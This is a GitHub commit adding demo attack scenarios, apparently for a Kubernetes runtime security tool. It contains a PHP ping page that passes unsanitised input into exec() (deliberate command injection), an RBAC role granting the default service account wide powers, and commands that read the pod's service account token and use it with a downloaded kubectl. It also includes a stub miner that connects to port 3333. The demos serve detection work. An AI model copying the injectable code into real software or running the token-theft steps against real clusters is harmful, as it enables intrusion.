Adding demo files (#96)

* Adding demo files Signed-off-by: Amit Schendel <[email protected]> * Updating demo files Signed-off-by: Amit Schendel <[email protected]> --------- Signed-off-by: Amit Schendel <[email protected]>
armosec · Dec 20, 2023 · 298cf07 · 298cf07
1 parent 3799245
commit 298cf07
Show file tree

Hide file tree

Showing 9 changed files with 248 additions and 0 deletions.
diff --git a/demo/general_attack/commands.md b/demo/general_attack/commands.md
@@ -0,0 +1,13 @@
+# Service Account Token
+cat /run/secrets/kubernetes.io/serviceaccount/token
+
+# K8s client - From inside a pod
+```
+arch=$(uname -m | sed 's/x86_64/amd64/g' | sed 's/aarch64/arm64/g')
+curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/$arch/kubectl"
+ls -l kubectl
+mv kubectl /var/tmp/kubectl
+chmod +x /var/tmp/kubectl
+cat /var/run/secrets/kubernetes.io/serviceaccount/token > /var/tmp/token
+/var/tmp/kubectl --server https://kubernetes.default --insecure-skip-tls-verify --token $(cat /var/tmp/token) get pods
+```
diff --git a/demo/general_attack/webapp/Containerfile b/demo/general_attack/webapp/Containerfile
@@ -0,0 +1,17 @@
+# Use the official PHP image
+FROM php:7.4-apache
+
+# Install ping
+RUN apt-get update && \
+    apt-get install -y iputils-ping wget curl && \
+    rm -rf /var/lib/apt/lists/*
+
+# Copy the PHP script and index.html files into the container
+COPY ping.php /var/www/html/
+COPY index.html /var/www/html/
+
+# Expose port 80 for Apache
+EXPOSE 80
+
+# Start Apache in the foreground
+CMD ["apache2-foreground"]
diff --git a/demo/general_attack/webapp/index.html b/demo/general_attack/webapp/index.html
@@ -0,0 +1,81 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>IP Ping Tool</title>
+    <style>
+        body {
+            font-family: 'Arial', sans-serif;
+            background-color: #f4f4f4;
+            margin: 0;
+            padding: 0;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+        }
+
+        h1 {
+            text-align: center;
+            color: #333;
+        }
+
+        form {
+            background-color: #fff;
+            padding: 20px;
+            border-radius: 8px;
+            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
+            width: 300px;
+        }
+
+        label {
+            display: block;
+            margin-bottom: 10px;
+            color: #555;
+        }
+
+        input {
+            width: 100%;
+            padding: 8px;
+            margin-bottom: 15px;
+            box-sizing: border-box;
+            border: 1px solid #ccc;
+            border-radius: 4px;
+            font-size: 14px;
+        }
+
+        button {
+            background-color: #4caf50;
+            color: #fff;
+            padding: 10px 15px;
+            border: none;
+            border-radius: 4px;
+            cursor: pointer;
+            font-size: 16px;
+        }
+
+        button:hover {
+            background-color: #45a049;
+        }
+
+        pre {
+            white-space: pre-wrap;
+            word-wrap: break-word;
+        }
+
+        .success {
+            color: #4caf50;
+        }
+    </style>
+</head>
+<body>
+    <form action="ping.php" method="get">
+        <h1>Ping Tool</h1>
+        <label for="ip">Enter IP Address:</label>
+        <input type="text" id="ip" name="ip" autocomplete="off" required>
+        <button type="submit">Ping</button>
+    </form>
+</body>
+</html>
diff --git a/demo/general_attack/webapp/ping-app.yaml b/demo/general_attack/webapp/ping-app.yaml
@@ -0,0 +1,52 @@
+apiVersion: v1
+kind: Pod
+metadata:
+  name: ping-app
+  labels:
+    app: ping-app
+spec:
+
+  containers:
+  - name: ping-app
+    image: docker.io/library/ping-app:latest # Replace with quay.io/armosec/ping-app:latest
+    imagePullPolicy: IfNotPresent
+    ports:
+    - containerPort: 80
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: ping-app
+  labels:
+    app: ping-app
+spec:
+  selector:
+    app: ping-app
+  ports:
+  - protocol: TCP
+    port: 80
+    targetPort: 80
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  namespace: default
+  name: ping-app-role
+rules:
+- apiGroups: [""]
+  resources: ["*"]
+  verbs: ["get", "list", "watch", "create", "update", "delete"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  namespace: default
+  name: ping-app-role-binding
+subjects:
+- kind: ServiceAccount
+  name: "default"
+  namespace: default
+roleRef:
+  kind: Role
+  name: ping-app-role
+  apiGroup: rbac.authorization.k8s.io
diff --git a/demo/general_attack/webapp/ping.php b/demo/general_attack/webapp/ping.php
@@ -0,0 +1,26 @@
+<?php
+// Get the IP address from the URL parameter
+$ip = $_GET['ip'];
+
+// Execute the ping command
+exec("ping -c 4 $ip", $output, $return_var);
+
+// Format and display the result
+echo "<pre>";
+echo "<strong>Ping results for $ip:</strong><br>";
+
+// Iterate through each line of the output
+foreach ($output as $line) {
+    // Highlight successful pings in green
+    if (strpos($line, "icmp_seq") !== false && strpos($line, "time=") !== false) {
+        echo "<span style='color: #4caf50;'>" . htmlspecialchars($line) . "</span><br>";
+    } else {
+        echo htmlspecialchars($line) . "<br>";
+    }
+}
+
+echo "</pre>";
+
+// Display the return status
+echo "<strong>Return status:</strong> $return_var";
+?>
diff --git a/demo/general_attack/webapp/setup.sh b/demo/general_attack/webapp/setup.sh
@@ -0,0 +1,22 @@
+#!/bin/bash
+
+# Kill any existing port forwards
+echo "[+] Killing any existing port forwards"
+killall kubectl 2>/dev/null
+
+# Apply the YAML file for the web app
+echo "[+] Applying YAML file for the web app"
+kubectl apply -f ping-app.yaml
+
+# Wait for the web app to be ready
+echo "[+] Waiting for the web app to be ready"
+kubectl wait --for=condition=ready pod -l app=ping-app
+
+# Port forward from port 80 to port localhost:8080
+echo "[+] Port forwarding from port 80 to localhost:8080"
+kubectl port-forward pod/ping-app 8080:80 2>&1 >/dev/null &
+
+# Wait for the port forward to be ready
+echo "[+] Waiting for the port forward to be ready"
+sleep 1
+echo "[+] The web app is ready"
diff --git a/demo/miner/Dockerfile b/demo/miner/Dockerfile
@@ -0,0 +1,7 @@
+FROM python:latest
+
+WORKDIR /usr/app/src
+
+COPY xmr-k8s-miner.py ./
+
+CMD [ "python", "./xmr-k8s-miner.py"]
diff --git a/demo/miner/miner-pod.yaml b/demo/miner/miner-pod.yaml
@@ -0,0 +1,9 @@
+apiVersion: v1
+kind: Pod
+metadata:
+  name: k8s-miner 
+spec:
+  containers:
+  - name: k8s-miner
+    image: docker.io/library/k8s-miner:latest # Replace with quay.io/armosec/k8s-miner:latest
+    imagePullPolicy: IfNotPresent
diff --git a/demo/miner/xmr-k8s-miner.py b/demo/miner/xmr-k8s-miner.py
@@ -0,0 +1,21 @@
+# THIS IS A DEMO FILE, NOT INTENDED FOR PRODUCTION USE
+# This file is used to demonstrate how a connection to a mining pool can be detected by the port 3333 which is used by the stratum protocol.
+# The Stratum protocol is used by mining pools to communicate with miners.
+import socket
+import time
+
+PORT = 3333
+
+
+def main():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        s.connect(("1.1.1.1", PORT))
+    except socket.gaierror as ex:
+        print(ex)
+        print("Got exception")
+    time.sleep(10000000)
+
+
+if __name__ == "__main__":
+    main()